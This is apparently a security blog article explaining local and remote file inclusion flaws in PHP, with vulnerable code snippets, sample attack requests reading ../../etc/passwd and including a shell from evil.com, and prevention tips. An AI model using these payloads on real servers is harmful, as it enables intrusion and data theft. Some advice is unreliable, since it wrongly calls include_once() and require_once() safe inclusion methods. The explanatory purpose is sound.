man in black hoodie using macbook
Wed Jun 14

File Inclusion Vulnerability - A Comprehensive Guide

File inclusion vulnerability is a significant web application security flaw that enables attackers to execute arbitrary code on the server or client-side by including malicious files in web pages. This flaw can result in severe consequences, including data theft, defacement, malware infections, denial of service attacks, or even complete system compromise.

File inclusion vs. directory traversal

In [another article](https://www.binaryte.com/blog/exploiting-directory- traversal-vulnerability), we have explained a lot about directory traversal which is quite similar to file inclusion. However, the main difference between the two is that file inclusion may allow the attacker to include an arbitrary file which can be executed. On the other hand, directory only allows the attacker to read supposedly inaccessible files within the server without the ability to execute it. While both vulnerabilities may allow the attacker to read arbitrary files from the server, file inclusion can also lead to the RCE (Remote Code Execution).

Types of file inclusion vulnerability

There are two primary types of file inclusion vulnerability: local file inclusion (LFI) and remote file inclusion (RFI). While both types involve the inclusion of malicious files in web pages, they differ in terms of the file’s source and location.

Local File Inclusion (LFI)

Local file inclusion (LFI) occurs when an attacker can include a file that already exists on the server. This could involve sensitive files like configuration files, logs, or backups. Exploiting LFI typically involves manipulating user input to construct a file path, leading to its inclusion in a web page. For instance, a vulnerable PHP code snippet may use the $_GET['page'] parameter to include a file:

<?php
$page = $_GET['page'];
include($page . '.php');
?>

By manipulating the page parameter, an attacker could change the request to:

https://example.com/index.php?page=../../etc/passwd

This request would cause the server to include the /etc/passwd file, which contains usernames and passwords. The attacker can then access this sensitive information for further malicious activities.

Remote File Inclusion (RFI)

Remote file inclusion (RFI) arises when an attacker can include a file hosted on a remote server. In this scenario, the attacker can introduce a malicious script that executes arbitrary commands on the server or sends harmful requests to other servers. Similar to LFI, RFI exploits vulnerable web applications that utilize user input to construct a URL for file inclusion. Let’s again use the vulnerable PHP code snippet:

<?php
$page = $_GET['page'];
include($page);
?>

By manipulating the page parameter, an attacker could send a request like:

http://example.com/index.php?page=http://evil.com/shell.php

As you can see, the server would include the shell.php file from evil.com, which contains malicious code that executes on the server. The attacker can then gain control over the server or utilize it as a proxy for further attacks.

Exploiting File Inclusion Vulnerability

To exploit file inclusion vulnerability, attackers must identify a susceptible web application that uses user input to include files in web pages. They then create malicious requests to manipulate the input and include harmful files on either the server itself or remote servers. This process is facilitated by a range of methods and tools employed by attackers.

Manual testing

Attackers manually test different parameters and values to identify and exploit file inclusion vulnerabilities. They use browsers, curl, wget, or similar tools to send requests with diverse values for the page parameter, observing the server’s responses.

Automated scanning

Attackers employ automated tools like Burp Suite, or OWASP ZAP to scan web applications for file inclusion vulnerabilities. These tools identify common vulnerable parameters and values and generate malicious requests to exploit them.

Fuzzing

Attackers utilize fuzzing tools such as [ffuf](https://www.binaryte.com/blog/fuzzing-the-right-way-maximizing-results- with-ffuf), dirb, or dirbuster to generate numerous requests with random or semi-random values for the fuzzing the parameter. By analyzing the responses, attackers can uncover hidden or obscure files vulnerable to file inclusion attacks.

Source code analysis

Attackers scrutinize the source code of web applications to identify file inclusion vulnerabilities. This analysis helps them understand the web application’s logic and structure and identify parameters and values susceptible to file inclusion attacks.

File Inclusion Vulnerability Prevention

Web developers and administrators can adopt several best practices and recommendations to mitigate file inclusion vulnerability risks.

Validate User Input

Web applications should validate user input before including files in web pages. This can involve checking if the input matches a predefined whitelist of allowed files or URLs or identifying and blocking illegal characters or patterns that may indicate file inclusion attempts.

Sanitize User Input

Web applications should sanitize user input before including files in web pages. Special characters or sequences that could manipulate file paths or URLs, such as ../, ./, //, https://, should be removed or encoded to ensure they do not pose a security risk.

Use Absolute Paths

Web applications should use absolute paths instead of relative paths when including files in web pages. This practice prevents attackers from traversing the directory structure and accessing sensitive files on the server.

Disable Remote File Inclusion

Web applications should disable remote file inclusion if it is unnecessary. For instance, PHP web applications can disable remote file inclusion by setting the allow_url_include and allow_url_fopen directives to off in the php.ini file. This measure prevents attackers from including malicious files from remote servers.

Use Secure Coding Practices

Web developers should adhere to secure coding practices and utilize frameworks that mitigate or prevent file inclusion vulnerabilities. For example, functions or methods specifically designed for safe file inclusion, such as require_once() or include_once() in PHP or import() or require() in JavaScript, should be utilized.

Conclusion

File inclusion vulnerability is a prevalent and dangerous flaw in web security that allows attackers to execute arbitrary code by including malicious files in web pages. Local file inclusion (LFI) and remote file inclusion (RFI) are the two main types of this vulnerability. LFI involves including files present on the server, while RFI includes files hosted on remote servers.

To exploit file inclusion vulnerability, attackers search for vulnerable web applications that utilize user input for file inclusion. They can then manipulate the input to include malicious files on the server or remote servers. Manual testing, automated scanning, fuzzing, and code analysis are common methods attackers employ for exploitation.

Preventing file inclusion vulnerability requires implementing best practices and recommendations such as validating and sanitizing user input, using absolute paths, disabling remote file inclusion, and adhering to secure coding practices and frameworks. We hope this article has provided you with a comprehensive understanding of file inclusion vulnerability, its exploitation methods, and effective prevention strategies.

You might like

Linux dd Command: A Complete Guide

Learn how to use the Linux dd command for copying and converting data in various ways. Find out how to create disk or partition images, ISO files, wipe data securely, and more.
Mastering Cron Expressions for Efficient Task Scheduling

Learn how to use cron expressions to schedule tasks automatically and reliably in different environments and platforms. Find out the structure, syntax, examples, and best practices of cron expressions.